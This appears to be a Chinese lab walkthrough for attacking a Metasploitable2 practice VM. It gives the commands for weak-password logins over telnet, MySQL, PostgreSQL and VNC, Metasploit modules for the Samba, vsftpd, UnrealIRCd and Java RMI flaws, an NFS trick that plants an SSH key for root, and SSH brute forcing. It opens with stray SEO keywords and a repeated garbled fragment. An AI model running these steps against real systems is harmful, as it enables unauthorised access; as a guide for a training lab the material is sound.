个人网站设计源代码,市场营销案例分析及解答,佛山公司推广优化,软文范文大全1000字一、系统弱密码登录
1、在kali上执行命令行telnet 192.168.26.129
2、Login和password都输入msfadmin
3、登录成功#xff0c;进入系统
4、测试如下#xff1a; 二、MySQL弱密码登录#xff1a;
1、在kali上执行mysql –h 192.168.26.129 –u root
2、登录成功#…一、系统弱密码登录
1、在kali上执行命令行telnet 192.168.26.129
2、Login和password都输入msfadmin
3、登录成功进入系统
4、测试如下 二、MySQL弱密码登录
1、在kali上执行mysql –h 192.168.26.129 –u root
2、登录成功进入MySQL系统
3、测试效果 三、PostgreSQL弱密码登录
1、在Kali上执行psql -h 192.168.26.129 –U postgres
2、输入密码postgres
3、登录成功进入postgresql系统
测试效果 四、VNC弱密码登录
1、在kali图形界面的终端中执行vncviewer 192.168.26.129
2、输入密码 password
3、登录成功进入系统
测试效果 五、Samba MS-RPC Shell 命令注入漏洞
利用步骤 1.在kali中执行msfconsole启动metasploit 2.Use exploit/multi/samba/usermap_script,选择漏洞库 3.Set RHOST 192.168.26.129 设置要攻击的机器IP 4.Exploit开始攻击 5.利用成功执行uname –a 验证
测试效果 六、Vsftpd源码包后门漏洞
步骤
1、在kali中执行msfconsole,启动metasploit
2、use exploit/unix/ftp/vsftpd_234_backdoor,选择漏洞
3、set RHOST 192.168.26.129
4、利用成功执行uname –a 验证
5、测试过程 七、UnreallRCd后门漏洞
步骤
1、在kali中执行msfconsole启动metasploit
2、use exploit/unix/irc/unreal_ircd_3281_backdoor,选择漏洞
set RHOST 192.168.26.129 ,设置要攻击的目标IP地址
3、开始攻击
4、利用成功使用uname –a 验证
测试效果 八、Linux NFS共享目录配置漏洞
问题在2中需要创建 /tmp/test目录并在目录下创建如未创建则不能进行下一步
步骤
在kali上执行命令rpcinfo –p 192.168.26.129 ,查看nfs服务有无开启showmount –e 19168.26.129 查看其设置的远程目录列表输入ssh-keygen 生成RSA公钥依次输入
1mount –t nfs 192.168.26.129://tmp/test(预先创建)把192.168.160.131的根目录挂载到/tmp/test/下
注如果提示下图中错误则需要/etc/init.d/rpcbind start 来启动mount
2cat /root/.ssh/id_rsa.pub/tmp/test/root/.ssh/authorized_keys把生成的公钥追加到靶机的authorized_keys下
3ssh root192.168.26.129,实现无密码登录 九、Java RMI SERVER 命令执行漏洞1099/tcp
1.Nmap –p 0-65535 192.168.26.129 来查看1099端口是否开启
2.进入msfconsole框架依次输入以下命令
1use exploit/multi/misc/java_rmi_server
2set RHOST 192.168.26.129(靶机的IP地址)
3run
4session
5shell(进入meterpreter时执行) 十、Root用户弱口令漏洞SSH爆破
步骤
输入nmap –sV -O大写 192.168.26.129 查看SSh端口是否开启开启metasploit framework 框架依次输入 use auxiliary/scanner/ssh/ssh_loginset RHOSTS 192.168.26.129set USERNAME rootset PASS_FILE pass.txt(字典文件需要预先生成)set THREADS 50run我在网上找了Metasploitable2 靶机下载了解压出来打开直接能用
链接https://pan.baidu.com/s/1gV75x5wV4-1TsDTIZoImXw 提取码gx9z
